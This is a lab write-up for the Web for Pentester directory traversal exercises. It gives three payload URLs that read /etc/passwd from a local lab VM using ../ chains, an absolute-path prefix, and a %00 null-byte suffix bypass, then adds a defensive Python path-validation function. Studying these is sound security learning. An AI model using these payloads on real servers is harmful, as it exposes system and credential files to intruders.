Web for Pentester writeup: Directory traversal

Directory traversal

Directory traversal vulnerabilities. This section has three examples; look at the source code directly.

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808102050863-1371248697.png)

Example 1

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808102335362-754406170.png)

<1> Test input `./`: we stay in the current directory

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808102345221-624039856.png)

<2> Test input `../`: the directory changes, so we guess it moves to the parent directory

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808102355188-36212944.png)

Walk straight up to the root directory and test whether /etc/passwd can be read.

Payload:
http://192.168.219.136/dirtrav/example1.php?file=../../../../../../../../../etc/passwd

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808102405953-1976091057.png)

Example 2

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808102412490-1440822577.png)

This one turns out to use an absolute path; as above, walk straight up to the root directory and test whether /etc/passwd can be read.

Payload:
http://192.168.219.136/dirtrav/example2.php?file=/var/www/files/../../../../../../../../../../etc/passwd

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808102448352-1919378040.png)

Example 3

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808102556286-1017459648.png)

There is no suffix here; testing `../../../../../../etc/passwd` directly returns nothing.

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808102606746-1976925149.png)

We guess that a .png suffix is appended to the parameter automatically, so we use %00 (the URL encoding of the NUL byte) to truncate the suffix.

Payload:
http://192.168.219.136/dirtrav/example3.php?file=../../../../../../../etc/passwd%00

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808102613858-216281601.png)

Using a null byte to strip any suffix added by server-side code is a common bypass, often seen in Perl and in older versions of PHP.
In this environment the problem is simulated, because PHP fixed this bypass from version 5.3.4 onwards (http://php.net/releases/5_3_4.php).
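As an added example (not code from the original writeup or from Web for Pentester), here is a server-side check in Python that closes all three holes shown above: it rejects NUL bytes, refuses absolute paths, appends the suffix before normalising, and only serves paths that resolve beneath the base directory. It assumes `/var/www/files` as the served directory (from the example 2 URL) and a `.png` suffix as in example 3.

```python
import os
from urllib.parse import unquote

# Assumed document root for the served files, taken from the example2 URL.
BASE_DIR = "/var/www/files"


def safe_file_path(user_value, base_dir=BASE_DIR, suffix=""):
    """Map a user-supplied file name to an absolute path under base_dir.

    Returns the resolved path, or None when the request must be refused.
    Covers the three failure modes from the exercises: relative ../
    traversal (example 1), traversal appended to an absolute prefix
    (example 2) and a NUL byte used to cut off a server-added suffix
    (example 3).
    """
    # No legitimate file name contains NUL; refuse it explicitly instead of
    # relying on the runtime (PHP >= 5.3.4 rejects it, older versions truncated).
    if "\x00" in user_value:
        return None
    # The parameter names a file *under* base_dir, so an absolute path is never valid.
    if os.path.isabs(user_value):
        return None
    base = os.path.realpath(base_dir)
    # Append the suffix first, then normalise: any ../ chain collapses here,
    # so the containment test below sees the path the filesystem would open.
    candidate = os.path.realpath(os.path.join(base, user_value + suffix))
    # Must be strictly beneath base_dir (the separator stops /var/www/files2 matching).
    if not candidate.startswith(base + os.sep):
        return None
    return candidate


def resolve_request(file_param, suffix=".png"):
    """Decode the raw query value the way the web server does, then validate.

    Mirrors example3.php appending .png: the %00 in the page's payload
    becomes a real NUL after decoding and is rejected by safe_file_path.
    """
    return safe_file_path(unquote(file_param), suffix=suffix)
```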

https://chaceshadow.github.io/
Original article: https://www.cnblogs.com/liliyuanshangcao/p/11319648.html